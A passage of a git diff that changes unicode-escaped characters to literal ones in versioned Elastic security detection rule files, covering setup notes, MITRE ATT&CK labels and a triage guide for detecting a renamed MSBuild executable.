"framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -103,7 +103,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", 
diff --git a/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_104.json b/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_104.json index e27a0176235..f90c46c0bcf 100644 --- a/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_104.json +++ b/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_104.json @@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "9ccf3ce0-0057-440a-91f5-870c6ad39093", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -103,7 +103,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_105.json b/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_105.json index 7749905d8aa..eaa1390ce21 100644 --- a/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_105.json 
+++ b/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_105.json @@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "9ccf3ce0-0057-440a-91f5-870c6ad39093", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -102,7 +102,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_106.json b/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_106.json index b3ac178f45a..0c8e934feed 100644 --- a/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_106.json +++ b/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_106.json 
@@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "9ccf3ce0-0057-440a-91f5-870c6ad39093", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -103,7 +103,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_107.json b/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_107.json index a26ea0e0e25..25409b7ca28 100644 --- a/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_107.json +++ b/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_107.json 
@@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "9ccf3ce0-0057-440a-91f5-870c6ad39093", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -104,7 +104,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -119,7 +119,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_108.json b/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_108.json index 27e11713f99..ff926d567b9 100644 --- a/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_108.json +++ b/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_108.json 
@@ -62,7 +62,7 @@ ], "risk_score": 21, "rule_id": "9ccf3ce0-0057-440a-91f5-870c6ad39093", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -103,7 +103,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -118,7 +118,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_103.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_103.json index 8cfe72e6e3e..b6e76254df9 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_103.json 
+++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_103.json @@ -58,7 +58,7 @@ ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_104.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_104.json index 8019ce99661..521bbcb1cf4 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_104.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_104.json 
@@ -58,7 +58,7 @@
 ],
 "risk_score": 21,
 "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -91,7 +91,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_105.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_105.json
index eb4f7c06082..d55ede41639 100644
--- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_105.json
@@ -58,7 +58,7 @@
 ],
 "risk_score": 21,
 "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -92,7 +92,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_205.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_205.json
index 50cfc438574..9966b1114c1 100644
--- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_205.json
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -100,7 +100,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_206.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_206.json
index 9812ad05d0d..8671622f9dc 100644
--- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_206.json
+++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_206.json
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -100,7 +100,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_207.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_207.json
index 464592bb652..2498d07380d 100644
--- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_207.json
+++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_207.json
@@ -67,7 +67,7 @@
 ],
 "risk_score": 21,
 "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -79,7 +79,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -101,7 +101,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_104.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_104.json
index 8383098de06..0c2f516f713 100644
--- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_104.json
@@ -53,7 +53,7 @@
 ],
 "risk_score": 47,
 "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -87,7 +87,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_105.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_105.json
index 93630163e87..757c6cfa80b 100644
--- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_105.json
@@ -53,7 +53,7 @@
 ],
 "risk_score": 47,
 "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -86,7 +86,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_106.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_106.json
index 857d9af3e2a..f6353cd359f 100644
--- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_106.json
@@ -53,7 +53,7 @@
 ],
 "risk_score": 47,
 "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -87,7 +87,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_107.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_107.json
index 5631a498647..3761142cca0 100644
--- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_107.json
@@ -53,7 +53,7 @@
 ],
 "risk_score": 47,
 "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -88,7 +88,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_108.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_108.json
index a684b1d4e08..0b419c7bc1b 100644
--- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_108.json
@@ -52,7 +52,7 @@
 ],
 "risk_score": 47,
 "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -87,7 +87,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_104.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_104.json
index 8e8a5254413..26c01c3c654 100644
--- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_104.json
@@ -17,7 +17,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Build Engine Using an Alternate Name", - "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. 
This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' 
